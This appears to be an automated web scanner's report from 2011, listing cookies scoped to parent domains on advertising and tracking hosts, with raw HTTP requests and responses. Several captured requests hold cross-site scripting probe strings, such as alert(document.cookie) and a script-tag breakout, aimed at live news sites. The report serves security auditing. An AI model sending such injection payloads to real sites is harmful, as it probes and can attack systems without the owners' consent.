GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 14:14:48 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 14:14:48 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296224088; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26257
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bmx3/broker.pli?pid=p83612734&PRAd=57555319&AR_C=39967551 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=10&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 21:57:55 2011&prad=58087444&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296251875%2E953%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jan 2011 22:52:05 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 24910
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1 Host: au.track.decideinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=8&c2=6135404&rn=534961991&c7=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&c3=15&c4=7477&c10=3182236&c8=Page%20Not%20Found&c9=http%3A%2F%2Fburp%2Fshow%2F4&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Fri, 28 Jan 2011 14:14:32 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 14:14:32 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=6035740&d.c=gif&d.o=desoundings&d.x=31314505&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x00241B%29%253C%2Fscript%253E HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Fri, 28 Jan 2011 15:00:13 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 15:00:13 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/5296924/?&site=5296924&cmd=mTagStartPage&lpCallId=388698517112-580234512686&protV=20&lpjson=1&page=http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-english&activePlugin=none&cobrowse=true&PV%21MktSegment=&PV%21unit=sales&PV%21Section=SEOLanding&PV%21CampaignCode=&PV%21pageLoadTime=4%20sec&PV%21visitorActive=1&SV%21language=english&title=Live%20Chat%20by%20LivePerson&cookie=visitor%3Dvarid%3Dbing%26ref%3Dbing%2Bcpc%2B%2Bchat%2B%252Dus%3B%20ASPSESSIONIDQSDTDCQS%3DICGJONICHIIHMLMANIPEDEIG%3B%20__utmz%3D1.1296223198.1.1.utmcsr%3Dbing%7Cutmccn%3Dchat%2520-us%7Cutmcmd%3Dcpc%3B%20__utma%3D1.925961970.1296223198.1296223198.1296223198.1%3B%20__utmc%3D1%3B%20__utmb%3D1.1.10.1296223198 HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 13:59:14 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-16101423669632-1296223154:0; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924 Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 28 Jan 2011 13:59:14 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:06:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LPit=false; path=/hc/5296924 Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 28 Jan 2011 14:06:54 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 893
lpConnLib.Process({"ResultSet": {"lpCallId":"1296223666173-668","lpCallConfirm":"","lpData":[{"eSeq":0,"params":["noChatSession","Chat session has ended. Please close this window and click the chat bu ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=2137335&Page=&PluID=0&Pos=1348\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
_t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:43:35 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "96e7c3afd30c151e7af6141145727255f5ec8c76" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Thu, 28 Apr 2011 17:43:35 GMT; Path=/ Content-Length: 1303
(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('21d8e954-2b06-11e0-8e8a-0025900870d2');(new Image()).src = 'http://bid.openx.net/cm?p ...[SNIP]...
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 978 Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=55 Expires: Fri, 28 Jan 2011 17:27:35 GMT Date: Fri, 28 Jan 2011 17:26:40 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 955 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=563 Expires: Fri, 28 Jan 2011 16:54:00 GMT Date: Fri, 28 Jan 2011 16:44:37 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 979 Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=257 Expires: Fri, 28 Jan 2011 17:30:57 GMT Date: Fri, 28 Jan 2011 17:26:40 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 956 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=562 Expires: Fri, 28 Jan 2011 16:54:00 GMT Date: Fri, 28 Jan 2011 16:44:38 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: cbs6albany.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 29 Jan 2011 05:24:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com Set-Cookie: a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com Content-Length: 101595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
